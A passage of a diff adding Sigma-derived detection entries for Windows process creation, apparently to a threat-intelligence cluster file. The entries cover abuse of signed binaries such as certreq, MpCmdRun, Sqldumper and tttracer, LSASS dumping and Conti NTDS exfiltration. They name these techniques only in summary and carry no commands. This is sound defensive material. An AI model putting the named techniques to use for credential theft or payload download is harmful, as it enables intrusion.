"proc_creation_win_lolbin_regasm.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "value": "REGISTER_APP.VBS Proxy Execution", + "meta": { + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_register_app.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "value": "Use of Remote.exe", + "meta": { + "refs": [ + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/02", + "filename": "proc_creation_win_lolbin_remote.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", + "value": "Replace.exe Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/03/06", + "filename": "proc_creation_win_lolbin_replace.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "value": "Rundll32 InstallScreenSaver Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ], + "creation_date": "2022/04/28", + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "level": "medium", + "falsepositive": [ + "Legitimate installation of a new screensaver" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", + "value": "Use of Scriptrunner.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/01", + "filename": "proc_creation_win_lolbin_scriptrunner.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use when App-v is deployed" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "value": "Using SettingSyncHost.exe as LOLBin", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" + ], + "creation_date": "2020/02/05", + "filename": "proc_creation_win_lolbin_settingsynchost.yml", + "author": "Anton Kutepov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "value": "Use Of The SFTP.EXE Binary As A LOLBIN", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/11/10", + "filename": "proc_creation_win_lolbin_sftp.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "value": "Sideloading Link.EXE", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1560732860935729152", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/22", + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "value": "Suspicious Sigverif Execution", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", + "https://twitter.com/0gtweet/status/1457676633809330184", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_sigverif.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", + "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "value": "Use of Squirrel.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_squirrel.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", + "value": "Suspicious LOLBIN AccCheckConsole", + "meta": { + "refs": [ + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/01/06", + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of the UI Accessibility Checker" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "value": "Suspicious Atbroker Execution", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_lolbin_susp_atbroker.yml", + "author": "Mateusz Wydra, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate, non-default assistive technology applications execution" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "value": "Suspicious Certreq Command to Download", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "value": "Suspicious Driver Install by pnputil.exe", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2021/09/30", + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of of Dxcap.exe", + "uuid": "60f16a96-db70-42eb-8f76-16763e333590", + "value": "Application Whitelisting Bypass via Dxcap.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://twitter.com/harr0ey/status/992008180904419328", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_lolbin_susp_dxcap.yml", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", + "level": "medium", + "falsepositive": [ + "Legitimate execution of dxcap.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "value": "Suspicious GrpConv Execution", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1526833181831200770", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ], + "creation_date": "2022/05/19", + "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect the use of Windows Defender to download payloads", + "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", + "value": "Windows Defender Download Activity", + "meta": { + "refs": [ + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/09/04", + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", + "author": "Matthew Matchen", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process dump via legitimate sqldumper.exe binary", + "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "value": "Dumping Process via Sqldumper.exe", + "meta": { + "refs": [ + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", + "author": "Kirill Kiryanov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate MSSQL Server actions" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", + "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "value": "WSL Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_lolbin_susp_wsl.yml", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Automation and orchestration scripts may use this method execute scripts etc", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/12", + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "App-V clients" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" + ], + "creation_date": "2021/07/16", + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "value": "Use of TTDInject.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/16", + "filename": "proc_creation_win_lolbin_ttdinject.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "value": "Time Travel Debugging Utility Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "high", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", + "value": "UtilityFunctions.ps1 Proxy Dll", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/05/28", + "filename": "proc_creation_win_lolbin_utilityfunctions.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "value": "Use of VisualUiaVerifyNative.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Legitimate testing of Microsoft UI parts." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "value": "Visual Basic Command Line Compiler Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "high", + "falsepositive": [ + "Utilization of this tool should not be seen in enterprise environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "value": "Use of VSIISExeLauncher.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "value": "Use of Wfc.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/01", + "filename": "proc_creation_win_lolbin_wfc.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Legitimate use by a software developer" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", + "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "value": "Winword LOLBIN Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", + "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/05/17", + "filename": "proc_creation_win_lolbin_winword.yml", + "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "value": "Wlrmdr Lolbin Use as Launcher", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/02/16", + "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "author": "frack113, manasmbellani", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Too long PowerShell command lines", + "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "value": "Too Long PowerShell Commandlines", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_long_powershell_commandline.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", + "value": "LSASS Memory Dumping", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_lsass_dump.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "value": "Suspicious PowerShell Mailbox Export to Share", + "meta": { + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2021/08/07", + "filename": "proc_creation_win_mailboxexport_share.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command used by conti to find volume shadow backups", + "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "value": "Conti Volume Shadow Listing", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ], + "creation_date": "2021/08/09", + "filename": "proc_creation_win_malware_conti.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command used by conti to exfiltrate NTDS", + "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "value": "Conti NTDS Exfiltration Command", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560" + ], + "creation_date": "2021/08/09", + "filename": "proc_creation_win_malware_conti_7zip.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "value": "Sensitive Registry Access via Volume Shadow Copy", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + 